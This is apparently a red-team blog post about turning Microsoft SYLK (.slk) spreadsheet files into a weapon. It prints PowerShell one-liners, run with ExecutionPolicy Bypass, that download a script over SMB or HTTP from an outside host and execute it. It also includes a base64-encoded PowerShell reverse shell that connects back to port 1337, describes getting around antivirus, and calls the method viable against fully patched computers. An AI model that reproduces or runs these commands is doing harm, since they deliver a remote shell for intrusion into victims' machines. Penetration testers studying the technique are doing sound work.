SLK format file - Not calc.exe weapon

2 minute read

After looking into the PoC of Stan and Pieter I started to look around how I’m going to be able to move from the mightiest calculator to the tiny reverse shell.

An SLK file is a file saved in the Symbolic Link (SYLK) format created by Microsoft to transfer data between spreadsheet programs and other databases. When it’s opened it can be used to exploit a computer.

The goal of this red team exercise is to find ways to use the SLK file to execute powershell script and get a reverse shell.

The first idea was to use directly powershell in the file and get the connection (to easy to be true!). toomuchchr

After that I discovered that we are limited to 255 characters. I was wondering about concatenate function and have multiple cells but couldn’t get it to execute properly so decided to change the approach on how to get it.

If we are limited in space the only option is to make more space! (I know this sounds stupid but it works!)

Instead of running code from the file we will download the code from a remote file and execute it. (once again really easy!).

For this step were taken two different approaches one thinking for internal assessments another for external. Internally we will use smbserver.py from impacket. Externally we will use a simple http python server to host our file.

Easy to say that both methods didn’t work but this time because of my anti virus. We know we can’t run scripts but we can run things like powershell.exe calc.exe.

Internal Assessment

With this in mind and for the internal assessment, we tried to use the Get-content cmdlet to get the code from our test file everything looked but the Get-Content reads one line each time not all output. To bypass this we decided to encode all the code with base64.

In the end the final code inside the slk file will be:

powershell.exe -ExecutionPolicy Bypass Get-content \\XXX.XXX.XXX.XXX\scripts\test.ps1 | powershell.exe -ExecutionPolicy Bypass

This piece of code has just 124 characters!

internal

External Assessment

For the external assessment the only part that changes is the Get-content with Invoke-WebRequest -Uri to do the web request.

powershell.exe Invoke-WebRequest -Uri http://XXX.XXX.XXX.XXX/test.txt | Select-Object -ExpandProperty Content| powershell.exe

This piece of code has just 125 characters!

external

Regarding the test.txt file contains the following code:

powershell.exe -encoded JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAWABYAFgALgBYAFgAWAAuAFgAWABYAC4AWABYAFgAIgAsADEAMwAzADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

Note the IP encoded here is XXX.XXX.XXX.XXX and the port 1337.

Final thoughts

This is a very viable method of compromising fully patched computers using the methods described